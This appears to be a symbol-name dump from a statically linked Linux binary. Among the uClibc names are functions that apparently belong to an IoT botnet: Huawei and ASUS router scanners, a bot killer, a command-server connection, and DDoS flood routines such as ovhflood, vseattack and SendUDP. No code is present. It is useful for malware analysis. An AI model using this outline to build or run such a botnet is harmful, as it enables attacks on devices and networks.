sigprocmask.c
times.c
wait4.c
xstatconv.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
libc/string/x86_64/mempcpy.S
memchr.c
memrchr.c
strncpy.c
strtok_r.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
__syscall_error.c
poll.c
fclose.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
fflush_unlocked.c
libc/string/x86_64/strcmp.S
libc/string/x86_64/strpbrk.S
libc/string/x86_64/strspn.S
rawmemchr.c
strncat.c
strdup.c
ntop.c
inet_pton4
xdigits.3747
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
lseek.c
strcasecmp.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
UpdateNameSrvs
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI___ctype_b
huaweiscanner_scanner_rawpkt
__GI_memchr
__GI___glibc_strerror_r
waitpid
conn_table
__open_nameservers
__GI_fopen
getrlimit
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
sysconf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
asus_kill
__GI_h_errno
__length_question
__GI___ctype_toupper
__GI_strcasecmp
advance_telstate
__GI_tolower
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
killerid
__pthread_mutex_lock
initConnection
__sigdelset
util_stristr
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
sendHTTPtwo
memmove
__bsd_signal
snprintf
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
_uintmaxtostr
__libc_fcntl
_h_errno
getc_unlocked
__ctype_b
strtoimax
__GI_random_r
resolv_domain_to_hostname
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
usleep
execve
getpagesize
getpid
bin_strings
util_strncmp
__GI_lseek64
setstate_r
getHost
__libc_getpid
util_fdgets
wildString
__xpg_strerror_r
SendUDP
fcntl64
getrlimit64
vseattack
memcpy
makeRandomStr
__GI_fputs_unlocked
__GI_fgets
rand_init
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
__GI_fgets_unlocked
__pthread_mutex_init
getuid
tolower
util_strcat
system
__open_etc_hosts
malloc
isatty
table_unlock_val
asus_scanner_rawpkt
strtoll
vsnprintf
__dns_lookup
ioctl_pid
__GI_read
recvfrom
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
reset_telstate
socket
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_closedir
asus_fake_time
isspace
__stdio_seek
mempcpy
__GI_strcoll
util_atoi
__GI_write
util_memsearch
__ctype_toupper
__libc_read
__GI_opendir
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
__GI_tcgetattr
__environ
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
__fgetc_unlocked
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
fstat64
__GI_inet_ntoa_r
__GI_setstate_r
strtol
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
resolv_lookup
__sigaddset
nanosleep
__GI_send
h_errno
calloc
__pthread_mutex_unlock
__GI_exit
__app_fini
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
environ
__GI_close
getBuild
__resolv_lock
fputs_unlocked
__pthread_mutex_trylock
huaweiscanner_rsck
__GI_brk
__GI_nanosleep
__GI_strtok
LOCAL_ADDR
_stdio_openlist
__GI_sigprocmask
inet_addr
__GI_fseek
__GI_setreuid
__deregister_frame_info
util_strlen
kill_bk
asus_recv_strip_null
util_zero
fseeko
_stdio_openlist_del_count
huaweiscanner_rsck_out
connectTimeout
__raise
setsockopt
bsd_signal
SendSTDHEX
__GI_times
huaweiscanner_scanner_kill
mremap
__GI_kill
__GI_strcmp
__GI_memmove
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
__GI_isatty
strcasestr
_start
strstr
__GI_ioctl
init_rand
signal
__xstat64_conv
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
table_retrieve_val
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
sendto
__C_ctype_toupper
findRandIP
__GI___C_ctype_b
table_key
realloc
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_recvfrom
__GI_getrlimit
__GI_strcpy
__GI_inet_ntop
strtok
getEndianness
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
rand_next
__stdio_rfill
strncat
setresuid
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
util_memcpy
_pthread_cleanup_push_defer
processCmd
__sigismember
__bss_start
setreuid
__libc_open
resolv_entries_free
get_telstate_host
memset
__GI_socket
__GI___libc_lseek
__glibc_strerror_r
util_local_addr
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
table_lock_val
initstate
fclose
__xstat_conv
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
__libc_recvfrom
opendir
checksum_generic
__libc_system
__GI_abort
seteuid
ovhflood
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
strcmp
__nameserver
data_start
__GI_sysconf
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
util_itoa
__GI_chdir
__vfork
__GI_mmap
huaweiscanner_scanner_pid
sprintf
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__decode_answer
__GI_signal
stderr
commServer
__C_ctype_b
srandom
_ppfs_setargs
huaweiscanner_recv_strip_null
__GI_sendto
__libc_fork
__atexit_lock
SendHTTPHex
huaweiscanner_scanner_init
scanPid
rand_cmwc
__libc_lseek
util_strcmp
__GI_setresuid
__libc_fcntl64
bin_names
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
contains_string
asus_init
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
rand__str
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
__GI_fstat
util_strcpy
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
__stdio_WRITE
_stdio_init
__GI_geteuid
checksum_tcpudp
inet_ntop
makevsepacket
asus_rsck
huaweiscanner_fake_time
asus_rsck_out
__C_ctype_toupper_data
_dl_aux_init
table_init
_errno
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
szprintf
__GI_lseek
strspn
__GI_strtoll
__libc_recv
rand_alpha_str
__libc_creat
strlen
lseek64
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
lets_rep
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
asus_scanner_pid
strchr
__GI_rawmemchr
__GI_raise
__data_start
__GI_inet_addr
__GI_seteuid
closedir
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
__GI___errno_location
setuid
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
lsof_pid
__libc_connect
checksum_tcp_udp
check_exe
__GI_strlen
__GI_fstat64
mainCommSock
strpbrk
_load_inttype
useragents
sigprocmask
getsockname
CleanDevice